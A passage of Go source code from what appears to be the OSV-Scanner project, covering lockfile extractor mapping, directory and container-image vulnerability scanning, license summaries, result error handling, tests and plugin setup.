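		cmdlogger.Errorf("Failed to run docker command (%q): %s", cmd.String(), err)
		return err
	}

	// This has to be captured before cmd.Wait() is called, as cmd.Wait() closes the stderr pipe.
	// NOTE(review): scanner.Err() is not checked, so a read error or an over-long
	// stderr line ends the capture early without being reported.
	var stderrLines []string
	scanner := bufio.NewScanner(stderr)
	for scanner.Scan() {
		stderrLines = append(stderrLines, scanner.Text())
	}

	err = cmd.Wait()
	if err != nil {
		cmdlogger.Errorf("Docker command exited with code (%q): %d\nSTDERR:", cmd.String(), cmd.ProcessState.ExitCode())
		for _, line := range stderrLines {
			cmdlogger.Errorf("> %s", line)
		}

		return errors.New("failed to run docker command")
	}

	return nil
}

================================================
FILE: pkg/osvscanner/internal/scanners/lockfile.go
================================================
// Package scanners provides functionality for scanning lockfiles.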
package scanners import ( "errors" "fmt" "path/filepath" "runtime" "slices" "strings" "github.com/google/osv-scalibr/extractor/filesystem" "github.com/google/osv-scalibr/extractor/filesystem/language/cpp/conanlock" "github.com/google/osv-scalibr/extractor/filesystem/language/dart/pubspec" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/depsjson" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packagesconfig" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packageslockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/erlang/mixlock" "github.com/google/osv-scalibr/extractor/filesystem/language/golang/gomod" "github.com/google/osv-scalibr/extractor/filesystem/language/haskell/cabal" "github.com/google/osv-scalibr/extractor/filesystem/language/haskell/stacklock" "github.com/google/osv-scalibr/extractor/filesystem/language/java/gradlelockfile" "github.com/google/osv-scalibr/extractor/filesystem/language/java/gradleverificationmetadataxml" "github.com/google/osv-scalibr/extractor/filesystem/language/java/pomxml" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/bunlock" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/pnpmlock" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/yarnlock" "github.com/google/osv-scalibr/extractor/filesystem/language/php/composerlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pdmlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pipfilelock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/poetrylock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pylock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/requirements" "github.com/google/osv-scalibr/extractor/filesystem/language/python/uvlock" 
"github.com/google/osv-scalibr/extractor/filesystem/language/r/renvlock" "github.com/google/osv-scalibr/extractor/filesystem/language/ruby/gemfilelock" "github.com/google/osv-scalibr/extractor/filesystem/language/rust/cargolock" "github.com/google/osv-scalibr/extractor/filesystem/os/apk" "github.com/google/osv-scalibr/extractor/filesystem/os/dpkg" "github.com/google/osv-scalibr/plugin" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" ) // OSV-Scanner and OSV-Scalibr has different plugin/override naming conventions. var osvscannerScalibrExtractionMapping = map[string][]string{ "apk-installed": {apk.Name}, "dpkg-status": {dpkg.Name}, "pubspec.lock": {pubspec.Name}, "pnpm-lock.yaml": {pnpmlock.Name}, "yarn.lock": {yarnlock.Name}, "package-lock.json": {packagelockjson.Name}, "pom.xml": {pomxml.Name}, "buildscript-gradle.lockfile": {gradlelockfile.Name}, "gradle.lockfile": {gradlelockfile.Name}, "verification-metadata.xml": {gradleverificationmetadataxml.Name}, "poetry.lock": {poetrylock.Name}, "Pipfile.lock": {pipfilelock.Name}, "pdm.lock": {pdmlock.Name}, "pylock.toml": {pylock.Name}, "requirements.txt": {requirements.Name}, "uv.lock": {uvlock.Name}, "Cargo.lock": {cargolock.Name}, "composer.lock": {composerlock.Name}, "mix.lock": {mixlock.Name}, "renv.lock": {renvlock.Name}, "deps.json": {depsjson.Name}, "packages.config": {packagesconfig.Name}, "packages.lock.json": {packageslockjson.Name}, "conan.lock": {conanlock.Name}, "go.mod": {gomod.Name}, "bun.lock": {bunlock.Name}, "Gemfile.lock": {gemfilelock.Name}, "gems.locked": {gemfilelock.Name}, "cabal.project.freeze": {cabal.Name}, "stack.yaml.lock": {stacklock.Name}, // "Package.resolved": {packageresolved.Name}, } // ParseLockfilePath returns (parseAs, path) func ParseLockfilePath(scanArg string) (string, string) { if runtime.GOOS == "windows" && filepath.IsAbs(scanArg) { return "", scanArg } parseAs, path, found := strings.Cut(scanArg, ":") if !found { path = parseAs parseAs = 
"" } return parseAs, path } // ParseAsToPlugin finds the parseAs extractor in the list of pluginsToUse func ParseAsToPlugin(parseAs string, pluginsToUse []plugin.Plugin) (filesystem.Extractor, error) { switch parseAs { case "": // No specific parseAs specified return nil, errors.New("no parseAs specified") case "osv-scanner": return osvscannerjson.Extractor{}, nil default: // Find and extract with the extractor of parseAs if names, ok := osvscannerScalibrExtractionMapping[parseAs]; ok && len(names) > 0 { i := slices.IndexFunc(pluginsToUse, func(plug plugin.Plugin) bool { _, ok = plug.(filesystem.Extractor) return ok && slices.Contains(names, plug.Name()) }) if i < 0 { return nil, fmt.Errorf("could not determine extractor, requested %s", parseAs) } fsysExtractor, ok := pluginsToUse[i].(filesystem.Extractor) if !ok { return nil, fmt.Errorf("invalid extractor name %s", parseAs) } return fsysExtractor, nil } return nil, fmt.Errorf("could not determine extractor, requested %s", parseAs) } } ================================================ FILE: pkg/osvscanner/invsort.go ================================================ package osvscanner import ( "cmp" "fmt" "github.com/google/osv-scalibr/converter" "github.com/google/osv-scalibr/extractor" ) // InventorySort is a comparator function for Inventories, to be used in // tests with cmp.Diff to disregard the order in which the Inventories // are reported. 
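func inventorySort(a, b *extractor.Package) int {
	// Orders packages by location, name, version, source-code info and PURL, in that order.
	// Two packages that agree on all five compare as equal; scan() in this package relies on
	// that when it de-duplicates with slices.CompactFunc.
	//
	// The original also compared two extractor-name strings that were never assigned, so that
	// comparison was always zero; it is dropped here without changing the resulting order.
	purlString := func(pkg *extractor.Package) string {
		// converter.ToPURL may return nil; such packages sort with an empty PURL.
		if p := converter.ToPURL(pkg); p != nil {
			return p.String()
		}

		return ""
	}

	return cmp.Or(
		cmp.Compare(a.Location.PathOrEmpty(), b.Location.PathOrEmpty()),
		cmp.Compare(a.Name, b.Name),
		cmp.Compare(a.Version, b.Version),
		// SourceCode is compared through its %v rendering.
		cmp.Compare(fmt.Sprintf("%v", a.SourceCode), fmt.Sprintf("%v", b.SourceCode)),
		cmp.Compare(purlString(a), purlString(b)),
	)
}

================================================
FILE: pkg/osvscanner/osvscanner.go
================================================
package osvscanner

import (
	"context"
	"errors"
	"fmt"
	"log/slog"
	"maps"
	"net/http"
	"os"
	"slices"
	"sort"
	"time"

	scalibr "github.com/google/osv-scalibr"
	"github.com/google/osv-scalibr/artifact/image/layerscanning/image"
	"github.com/google/osv-scalibr/binary/proto"
	"github.com/google/osv-scalibr/clients/datasource"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/inventory"
	scalibrlog "github.com/google/osv-scalibr/log"
	"github.com/google/osv-scalibr/plugin"
	"github.com/google/osv-scalibr/stats"
	"github.com/google/osv-scanner/v2/internal/clients/clientimpl/licensematcher"
	"github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher"
	"github.com/google/osv-scanner/v2/internal/clients/clientimpl/osvmatcher"
	"github.com/google/osv-scanner/v2/internal/clients/clientinterfaces"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/config"
	"github.com/google/osv-scanner/v2/internal/depsdev"
	"github.com/google/osv-scanner/v2/internal/imodels"
	"github.com/google/osv-scanner/v2/internal/imodels/results"
	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/pkg/models"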
"github.com/google/osv-scanner/v2/pkg/osvscanner/internal/imagehelpers" "github.com/ossf/osv-schema/bindings/go/osvconstants" "osv.dev/bindings/go/osvdev" ) type ScannerActions struct { ExperimentalScannerActions LockfilePaths []string DirectoryPaths []string GitCommits []string Recursive bool IncludeGitRoot bool NoIgnore bool Image string IsImageArchive bool ConfigOverridePath string CallAnalysisStates map[string]bool ShowAllPackages bool ShowAllVulns bool // local databases CompareOffline bool DownloadDatabases bool LocalDBPath string // license scanning ScanLicensesSummary bool ScanLicensesAllowlist []string // Deprecated: in favor of LockfilePaths SBOMPaths []string } type ExperimentalScannerActions struct { ExcludePatterns []string TransitiveScanning TransitiveScanningActions PluginsEnabled []string PluginsDisabled []string PluginsNoDefaults bool // Currently unused. // TODO(another-rex): Use or wrap this StatsCollector stats.Collector HTTPClient *http.Client // Report deprecated packages as findings FlagDeprecatedPackages bool // Allows specifying user agent RequestUserAgent string } type TransitiveScanningActions struct { Disabled bool NativeDataSource bool MavenRegistry string } type ExternalAccessors struct { // Matchers VulnMatcher clientinterfaces.VulnerabilityMatcher LicenseMatcher clientinterfaces.LicenseMatcher // Required for vendored Extractor OSVDevClient *osvdev.OSVClient } // ErrNoPackagesFound for when no packages are found during a scan. var ErrNoPackagesFound = errors.New("no packages found in scan") // ErrVulnerabilitiesFound includes vulnerabilities, license violations, and package deprecation, // however, will not be raised if only uncalled vulnerabilities are found. var ErrVulnerabilitiesFound = errors.New("vulnerabilities found") // ErrAPIFailed describes errors related to querying API endpoints. 
// TODO(v2): Actually use this error var ErrAPIFailed = errors.New("API query failed") func initializeExternalAccessors(actions ScannerActions) (ExternalAccessors, error) { externalAccessors := ExternalAccessors{} var err error userAgent := "osv-scanner-api" if actions.RequestUserAgent != "" { userAgent = actions.RequestUserAgent } // Offline Mode // ------------ if actions.CompareOffline { // --- Vulnerability Matcher --- externalAccessors.VulnMatcher, err = localmatcher.NewLocalMatcher(actions.LocalDBPath, userAgent, actions.DownloadDatabases) if err != nil { return ExternalAccessors{}, err } return externalAccessors, nil } // Online Mode // ----------- // --- Vulnerability Matcher --- externalAccessors.VulnMatcher = osvmatcher.New(5*time.Minute, userAgent, actions.HTTPClient) // --- License Matcher --- if len(actions.ScanLicensesAllowlist) > 0 || actions.ScanLicensesSummary { depsDevAPIClient, err := datasource.NewCachedInsightsClient(depsdev.DepsdevAPI, userAgent) if err != nil { return ExternalAccessors{}, err } externalAccessors.LicenseMatcher = &licensematcher.DepsDevLicenseMatcher{ Client: depsDevAPIClient, } } // --- OSV.dev Client --- // We create a separate client from VulnMatcher to keep things clean. 
externalAccessors.OSVDevClient = osvdev.DefaultClient() externalAccessors.OSVDevClient.Config.UserAgent = userAgent return externalAccessors, nil } // DoScan performs the osv scanner action, with optional reporter to output information func DoScan(actions ScannerActions) (models.VulnerabilityResults, error) { // --- Sanity check flags ---- // TODO(v2): Move the logic of the offline flag changing other flags into here from the main.go/scan.go if actions.CompareOffline { if actions.ScanLicensesSummary { return models.VulnerabilityResults{}, errors.New("cannot retrieve licenses locally") } } if !actions.CompareOffline && actions.DownloadDatabases { return models.VulnerabilityResults{}, errors.New("databases can only be downloaded when running in offline mode") } scanResult := results.ScanResults{ ConfigManager: config.Manager{ DefaultConfig: config.Config{}, ConfigMap: make(map[string]config.Config), }, } // --- Setup Config --- if actions.ConfigOverridePath != "" { err := scanResult.ConfigManager.UseOverride(actions.ConfigOverridePath) if err != nil { cmdlogger.Errorf("Failed to read config file: %s", err) return models.VulnerabilityResults{}, err } } // --- Setup Accessors/Clients --- accessors, err := initializeExternalAccessors(actions) if err != nil { return models.VulnerabilityResults{}, fmt.Errorf("failed to initialize accessors: %w", err) } // ----- Perform Scanning ----- packagesAndFindings, err := scan(accessors, actions) if err != nil { return models.VulnerabilityResults{}, err } scanResult.PackageScanResults = packagesAndFindings.Packages scanResult.Inventory = *packagesAndFindings // ----- Filtering ----- unscannablePackages := filterUnscannablePackages(&scanResult, actions) filterIgnoredPackages(&scanResult) // ----- Custom Overrides ----- overrideGoVersion(&scanResult) // --- Make Vulnerability Requests --- if accessors.VulnMatcher != nil { err = makeVulnRequestWithMatcher(&scanResult, accessors.VulnMatcher) if err != nil { return 
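models.VulnerabilityResults{}, err
		}
	}

	// --- Make License Requests ---
	if accessors.LicenseMatcher != nil {
		err = accessors.LicenseMatcher.MatchLicenses(context.Background(), scanResult.PackageScanResults)
		if err != nil {
			return models.VulnerabilityResults{}, err
		}
	}

	if len(unscannablePackages) > 0 {
		scanResult.PackageScanResults = slices.Concat(scanResult.PackageScanResults, unscannablePackages)
	}

	return finalizeScanResult(scanResult, actions)
}

// DoContainerScan scans a container image and returns the vulnerability results for it.
//
// The image is either a local tarball (actions.IsImageArchive, with actions.Image as its path) or an
// image name that is exported through the docker CLI into a temporary tarball first. When neither is
// given an error is returned; previously img stayed nil and was still handed to ScanContainer and
// CleanUp.
//
// The returned error follows finalizeScanResult: ErrVulnerabilitiesFound signals findings, and
// ErrNoPackagesFound is returned when the scan inventory is empty.
func DoContainerScan(actions ScannerActions) (models.VulnerabilityResults, error) {
	scanResult := results.ScanResults{
		ConfigManager: config.Manager{
			DefaultConfig: config.Config{},
			ConfigMap:     make(map[string]config.Config),
		},
	}

	if actions.ConfigOverridePath != "" {
		err := scanResult.ConfigManager.UseOverride(actions.ConfigOverridePath)
		if err != nil {
			cmdlogger.Errorf("Failed to read config file: %s", err)
			return models.VulnerabilityResults{}, err
		}
	}

	// --- Setup Accessors/Clients ---
	accessors, err := initializeExternalAccessors(actions)
	if err != nil {
		return models.VulnerabilityResults{}, fmt.Errorf("failed to initialize accessors: %w", err)
	}

	plugins := getPlugins(
		[]string{"artifact"},
		accessors,
		actions,
	)

	// technically having one detector enabled would also be sufficient, but we're
	// not mentioning them to avoid confusion since they're still in their infancy
	if countNotEnrichers(plugins) == 0 {
		return models.VulnerabilityResults{}, errors.New("at least one extractor must be enabled")
	}

	// --- Initialize Image To Scan ---

	// TODO: Setup context at the start of the run
	ctx := context.TODO()

	var img *image.Image
	switch {
	case actions.IsImageArchive:
		cmdlogger.Infof("Scanning local image tarball %q", actions.Image)
		img, err = image.FromTarball(actions.Image, image.DefaultConfig())
	case actions.Image != "":
		path, exportErr := imagehelpers.ExportDockerImage(ctx, actions.Image)
		if exportErr != nil {
			return models.VulnerabilityResults{}, exportErr
		}
		// The exported tarball is a temporary file owned by this function; remove it on every exit path.
		defer os.Remove(path)

		img, err = image.FromTarball(path, image.DefaultConfig())
		cmdlogger.Infof("Scanning image %q", actions.Image)
	default:
		// Nothing to scan: fail here instead of continuing with a nil image.
		return models.VulnerabilityResults{}, errors.New("no container image specified")
	}
	if err != nil {
		return models.VulnerabilityResults{}, err
	}
	defer func() {
		err := img.CleanUp()
		if err != nil {
			cmdlogger.Errorf("Failed to clean up image: %s", err)
		}
	}()

	// AllowUnsafePlugins is set unconditionally, so plugins that declare themselves unsafe are not
	// excluded by this capability set; logUnsafePlugins below only emits a warning for each of them.
	capabilities := &plugin.Capabilities{
		DirectFS:           true,
		RunningSystem:      false,
		Network:            plugin.NetworkOnline,
		OS:                 plugin.OSLinux,
		AllowUnsafePlugins: true,
	}

	if actions.CompareOffline {
		capabilities.Network = plugin.NetworkOffline
	}

	plugins = plugin.FilterByCapabilities(plugins, capabilities)
	logUnsafePlugins(plugins)

	// --- Do Scalibr Scan ---
	scanner := scalibr.New()
	scalibrSR, err := scanner.ScanContainer(context.Background(), img, &scalibr.ScanConfig{
		Plugins:           plugins,
		Capabilities:      capabilities,
		StoreAbsolutePath: true,
		ExplicitPlugins:   true,
	})
	if err != nil {
		return models.VulnerabilityResults{}, fmt.Errorf("failed to scan container image: %w", err)
	}

	if inventoryIsEmpty(scalibrSR.Inventory) {
		return models.VulnerabilityResults{}, ErrNoPackagesFound
	}

	// --- Save Scalibr Scan Results ---
	// The slice holds the same package pointers as the inventory, so a second assignment of
	// ExploitabilitySignals from the package onto itself (present in the original) was a no-op.
	scanResult.PackageScanResults = make([]*extractor.Package, len(scalibrSR.Inventory.Packages))
	for i, pkg := range scalibrSR.Inventory.Packages {
		scanResult.PackageScanResults[i] = pkg
	}

	// --- Fill Image Metadata ---
	pssr, err := proto.ScanResultToProto(scalibrSR)
	if err != nil {
		return models.VulnerabilityResults{}, fmt.Errorf("failed to serialize scan results to proto: %w", err)
	}
	// Only the first metadata entry is kept.
	if len(pssr.GetInventory().GetContainerImageMetadata()) > 0 {
		scanResult.ImageMetadata = pssr.GetInventory().GetContainerImageMetadata()[0]
	} else {
		cmdlogger.Warnf("No container image metadata found in scan results")
	}

	scanResult.Inventory = scalibrSR.Inventory

	// ----- Filtering -----
	unscannablePackages := filterUnscannablePackages(&scanResult, actions)
	filterIgnoredPackages(&scanResult)
	filterNonContainerRelevantPackages(&scanResult)

	// --- Make Vulnerability Requests ---
	if accessors.VulnMatcher != nil {
		err = makeVulnRequestWithMatcher(&scanResult, accessors.VulnMatcher)
		if err != nil {
			return models.VulnerabilityResults{}, err
		}
	}

	// --- Make License Requests ---
	if accessors.LicenseMatcher != nil {
		err = accessors.LicenseMatcher.MatchLicenses(context.Background(), scanResult.PackageScanResults)
		if err != nil {
			return models.VulnerabilityResults{}, err
		}
	}

	// Unscannable packages are added back after matching so they still appear in the results.
	if len(unscannablePackages) > 0 {
		scanResult.PackageScanResults = slices.Concat(scanResult.PackageScanResults, unscannablePackages)
	}

	return finalizeScanResult(scanResult, actions)
}

// finalizeScanResult turns the collected scan state into models.VulnerabilityResults: it builds the
// results, adds the license summary when requested, applies the configured filters, warns about
// ignore entries that matched nothing, and derives the returned error via determineReturnErr.
func finalizeScanResult(scanResult results.ScanResults, actions ScannerActions) (models.VulnerabilityResults, error) {
	vulnerabilityResults := buildVulnerabilityResults(actions, &scanResult)

	if actions.ScanLicensesSummary {
		vulnerabilityResults.LicenseSummary = buildLicenseSummary(&scanResult)
	}

	filtered := filterResults(&vulnerabilityResults, &scanResult.ConfigManager, actions.ShowAllPackages)
	if filtered > 0 {
		cmdlogger.Infof(
			"Filtered %d %s from output",
			filtered,
			output.Form(filtered, "vulnerability", "vulnerabilities"),
		)
	}

	// An ignore entry that no longer matches anything is reported per config file, in sorted
	// order, so stale suppressions are visible in the log.
	if unusedIgnoredEntries := scanResult.ConfigManager.GetUnusedIgnoreEntries(); len(unusedIgnoredEntries) != 0 {
		configFiles := slices.Collect(maps.Keys(unusedIgnoredEntries))
		slices.Sort(configFiles)

		for _, configFile := range configFiles {
			cmdlogger.Warnf("%s has unused ignores:", configFile)

			for _, iv := range unusedIgnoredEntries[configFile] {
				cmdlogger.Warnf(" - %s", iv.ID)
			}
		}
	}

	return vulnerabilityResults, determineReturnErr(vulnerabilityResults, actions.ShowAllVulns)
}

func buildLicenseSummary(scanResult *results.ScanResults) []models.LicenseCount {
	var licenseSummary []models.LicenseCount

	counts := make(map[string]int)
	for _, pkg := range scanResult.PackageScanResults {
		for _, l := range pkg.Licenses {
			counts[l] += 1
		}
	}

	if len(counts) == 0 {
		// No packages found.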
return []models.LicenseCount{}
	}

	licenses := slices.AppendSeq(make([]string, 0, len(counts)), maps.Keys(counts))

	// Sort the license count in descending count order with the UNKNOWN
	// license last. Licenses with equal counts are ordered by name.
	sort.Slice(licenses, func(i, j int) bool {
		if licenses[i] == "UNKNOWN" {
			return false
		}
		if licenses[j] == "UNKNOWN" {
			return true
		}
		if counts[licenses[i]] == counts[licenses[j]] {
			return licenses[i] < licenses[j]
		}

		return counts[licenses[i]] > counts[licenses[j]]
	})

	licenseSummary = make([]models.LicenseCount, len(licenses))
	for i, license := range licenses {
		licenseSummary[i].Name = models.License(license)
		licenseSummary[i].Count = counts[license]
	}

	return licenseSummary
}

// determineReturnErr determines whether we found a "vulnerability" or not,
// and therefore whether we should return a ErrVulnerabilitiesFound error.
//
// A finding is a vulnerability with a non-empty ID, a license violation, or a deprecated package.
// ErrVulnerabilitiesFound is returned for any finding, with one exception: when the only findings are
// vulnerabilities and none of them is both called and important, nil is returned unless showAllVulns
// is set. License violations and deprecations always produce the error.
func determineReturnErr(vulnResults models.VulnerabilityResults, showAllVulns bool) error {
	if len(vulnResults.Results) > 0 {
		var vuln bool
		// Stays true until a vulnerability that is called and not unimportant is seen.
		onlyUnimportantVuln := true
		var licenseViolation bool
		deprecated := false
		for _, vf := range vulnResults.Flatten() {
			if vf.Vulnerability != nil && vf.Vulnerability.GetId() != "" {
				vuln = true
				// TODO(gongh): rewrite the logic once we support reachability analysis for container scanning.
				if vf.GroupInfo.IsCalled() && !vf.GroupInfo.IsGroupUnimportant() {
					onlyUnimportantVuln = false
				}
			}
			if len(vf.LicenseViolations) > 0 {
				licenseViolation = true
			}
			if vf.Deprecated {
				deprecated = true
			}
		}

		if !vuln && !licenseViolation && !deprecated {
			return nil
		}

		// The exemption only applies when vulnerabilities are the sole kind of finding.
		onlyUnimportantVuln = onlyUnimportantVuln && vuln && !licenseViolation && !deprecated

		// If the user didn't enable showing all vulns and we only found unimportant ones,
		// we should return without error.
		if !showAllVulns && onlyUnimportantVuln {
			// There is no error.
			return nil
		}

		return ErrVulnerabilitiesFound
	}

	return nil
}

// makeVulnRequestWithMatcher asks matcher for the vulnerabilities of every package in
// scanResults.PackageScanResults and appends one inventory.PackageVuln per match to
// scanResults.Inventory.PackageVulns.
//
// NOTE(review): when the matcher returns an error together with a non-nil result, the error is only
// logged and nil is returned, so the caller cannot tell a complete result from a partial one.
//
// TODO(V2): Add context
func makeVulnRequestWithMatcher(
	scanResults *results.ScanResults,
	matcher clientinterfaces.VulnerabilityMatcher,
) error {
	res, err := matcher.MatchVulnerabilities(context.Background(), scanResults.PackageScanResults)
	if err != nil {
		cmdlogger.Errorf("error when retrieving vulns: %v", err)
		// Only a missing result is fatal; a non-nil result is used as it is.
		if res == nil {
			return err
		}
	}

	// res[i] is attached to PackageScanResults[i]; assumes the matcher returns its results in input
	// order and no more entries than packages - TODO confirm.
	for i, vulns := range res {
		for _, vuln := range vulns {
			scanResults.Inventory.PackageVulns = append(scanResults.Inventory.PackageVulns, &inventory.PackageVuln{
				Vulnerability: vuln,
				Package:       scanResults.PackageScanResults[i],
			})
		}
	}

	return nil
}

// Overrides Go version using osv-scanner.toml
//
// For every Go "stdlib" package, the version is replaced by the GoVersionOverride of the config that
// applies to the package's location, when that override is set. DoScan calls this before requesting
// vulnerabilities, so matching is done against the overridden version.
func overrideGoVersion(scanResults *results.ScanResults) {
	for i, pkg := range scanResults.PackageScanResults {
		if imodels.Name(pkg) == "stdlib" && imodels.Ecosystem(pkg).Ecosystem == osvconstants.EcosystemGo {
			configToUse := scanResults.ConfigManager.Get(imodels.Location(pkg))
			if configToUse.GoVersionOverride != "" {
				scanResults.PackageScanResults[i].Version = configToUse.GoVersionOverride
			}

			continue
		}
	}
}

// SetLogger sets the global slog handler for the cmdlogger.
func SetLogger(handler slog.Handler) { baseHandler := cmdlogger.NewOverride(handler) logger := slog.New(baseHandler) cmdlogger.GlobalLogger = logger scalibrlog.SetLogger(&cmdlogger.ScalibrAdapter{Logger: logger}) } // inventoryIsEmpty ignores image metadata when checking if an inventory is empty func inventoryIsEmpty(i inventory.Inventory) bool { if len(i.Packages) != 0 { return false } if len(i.PackageVulns) != 0 { return false } if len(i.GenericFindings) != 0 { return false } if len(i.Secrets) != 0 { return false } return true } ================================================ FILE: pkg/osvscanner/osvscanner_test.go ================================================ package osvscanner_test import ( "bytes" "errors" "log/slog" "testing" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" "github.com/google/osv-scanner/v2/pkg/osvscanner" ) // TestDoScan_LogHandlerOverride tests that the SetLogger override works correctly // //nolint:paralleltest // No parallel test since slog.SetDefault sets global behavior func TestDoScan_LogHandlerOverride(t *testing.T) { // Restore default slog behavior at the ned of the test defaultHandler := slog.Default() defer func() { slog.SetDefault(defaultHandler) }() actions := osvscanner.ScannerActions{ DirectoryPaths: []string{"../../cmd/osv-scanner/testdata/locks-many/Gemfile.lock"}, } output := bytes.NewBuffer(nil) slog.SetDefault(slog.New(slog.NewTextHandler(output, nil))) _, _ = osvscanner.DoScan(actions) // Test that normally logging is output correctly to the default slog handler. if output.Len() == 0 { t.Errorf("output.Len() = %d, want %d", output.Len(), 0) } // Clear output buffer for next run output.Truncate(0) // Test if output is overridden altOutput := bytes.NewBuffer(nil) osvscanner.SetLogger(slog.NewTextHandler(altOutput, nil)) _, _ = osvscanner.DoScan(actions) // Normal slog output should be empty. 
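if output.Len() != 0 {
		t.Errorf("output.Len() = %d, want %d", output.Len(), 0)
		t.Errorf("Got: %s", output.String())
	}

	// altOutput should contain data now instead.
	if altOutput.Len() == 0 {
		t.Errorf("altOutput.Len() = %d, want %d", altOutput.Len(), 0)
	}
}

func TestDoScan(t *testing.T) {
	t.Parallel()
	type args struct {
		actions osvscanner.ScannerActions
	}
	tests := []struct {
		name    string
		args    args
		want    models.VulnerabilityResults
		wantErr error
	}{
		{
			name: "Test_curl_git_scanning",
			args: args{
				actions: osvscanner.ScannerActions{
					GitCommits: []string{"33dffa3909a67e1b5d22647128ab7eb6e53fd0c7"},
				},
			},
			want:    models.VulnerabilityResults{},
			wantErr: osvscanner.ErrVulnerabilitiesFound,
		},
		// TODO: Add test cases.
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()

			got, err := osvscanner.DoScan(tt.args.actions)
			if !errors.Is(err, tt.wantErr) {
				t.Errorf("DoScan() error = %v, wantErr %v", err, tt.wantErr)
				return
			}

			snap := testutility.NewSnapshot()
			snap.MatchJSON(t, got)
		})
	}
}

================================================
FILE: pkg/osvscanner/scan.go
================================================
package osvscanner

import (
	"context"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"runtime"
	"slices"
	"strings"

	scalibr "github.com/google/osv-scalibr"
	cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto"
	"github.com/google/osv-scalibr/enricher"
	"github.com/google/osv-scalibr/enricher/packagedeprecation"
	"github.com/google/osv-scalibr/enricher/reachability/java"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/extractor/filesystem"
	"github.com/google/osv-scalibr/extractor/filesystem/simplefileapi"
	"github.com/google/osv-scalibr/fs"
	"github.com/google/osv-scalibr/inventory"
	"github.com/google/osv-scalibr/plugin"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitcommitdirect"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo"
	"github.com/google/osv-scanner/v2/internal/scalibrplugin"
	"github.com/google/osv-scanner/v2/internal/testlogger"
	"github.com/google/osv-scanner/v2/pkg/osvscanner/internal/scanners"
)

var ErrExtractorNotFound = errors.New("could not determine extractor suitable to this file")

// logUnsafePlugins emits a warning for every plugin whose requirements set AllowUnsafePlugins.
// It only warns; it does not remove the plugin from the list or stop the scan.
func logUnsafePlugins(plugins []plugin.Plugin) {
	for _, plug := range plugins {
		if plug.Requirements() != nil && plug.Requirements().AllowUnsafePlugins {
			cmdlogger.Warnf("Warning: plugin %s can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding.", plug.Name())
		}
	}
}

// configurePlugins passes the vendored-extractor configuration to every plugin via vendored.Configure.
func configurePlugins(plugins []plugin.Plugin, accessors ExternalAccessors, actions ScannerActions) {
	for _, plug := range plugins {
		vendored.Configure(plug, vendored.Config{
			// Only attempt to vendor check git directories if we are not skipping scanning root git directories
			ScanGitDir: !actions.IncludeGitRoot,
			OSVClient:  accessors.OSVDevClient,
		})
	}
}

// getPlugins resolves the plugins for a scan from the user's enabled/disabled lists plus the
// entries implied by the other options, and configures them.
//
// defaultPlugins is added to the enabled list unless actions.PluginsNoDefaults is set. The enabled and
// disabled lists are built on copies: actions is passed by value, but its slices share their backing
// arrays with the caller, and appending to them directly could write into the caller's spare capacity.
func getPlugins(defaultPlugins []string, accessors ExternalAccessors, actions ScannerActions) []plugin.Plugin {
	cfg := &cpb.PluginConfig{
		UserAgent: actions.RequestUserAgent,
		PluginSpecific: []*cpb.PluginSpecificConfig{
			{
				Config: &cpb.PluginSpecificConfig_PomXmlNet{
					PomXmlNet: &cpb.POMXMLNetConfig{
						UpstreamRegistry:    actions.TransitiveScanning.MavenRegistry,
						DepsDevRequirements: !actions.TransitiveScanning.NativeDataSource,
					},
				},
			},
			{
				Config: &cpb.PluginSpecificConfig_PythonRequirementsTransitive{
					PythonRequirementsTransitive: &cpb.PythonRequirementsTransitiveConfig{
						DepsDevRequirements: !actions.TransitiveScanning.NativeDataSource,
					},
				},
			},
		},
	}

	enabled := slices.Clone(actions.PluginsEnabled)
	disabled := slices.Clone(actions.PluginsDisabled)

	if !actions.PluginsNoDefaults {
		enabled = append(enabled, defaultPlugins...)
	}

	if !actions.TransitiveScanning.Disabled {
		enabled = append(enabled, "transitive")
	}

	if !actions.IncludeGitRoot {
		disabled = append(disabled, gitrepo.Name)
	}

	// The vendored extractor is disabled when there is no OSV.dev client for it to use.
	if accessors.OSVDevClient == nil {
		disabled = append(disabled, vendored.Name)
	}

	if actions.CallAnalysisStates["jar"] {
		enabled = append(enabled, java.Name)
	}

	if actions.FlagDeprecatedPackages {
		enabled = append(enabled, packagedeprecation.Name)
	}

	plugins := scalibrplugin.Resolve(enabled, disabled, cfg)

	// configurePlugins reads only IncludeGitRoot from actions, so the unmodified copy is sufficient.
	configurePlugins(plugins, accessors, actions)

	return plugins
}

// countNotEnrichers counts the number of plugins that are not enricher.Enricher plugins
func countNotEnrichers(plugins []plugin.Plugin) int {
	count := 0

	for _, plug := range plugins {
		_, ok := plug.(enricher.Enricher)

		if !ok {
			count++
		}
	}

	return count
}

// scan essentially converts ScannerActions into imodels.ScanResult by performing the extractions
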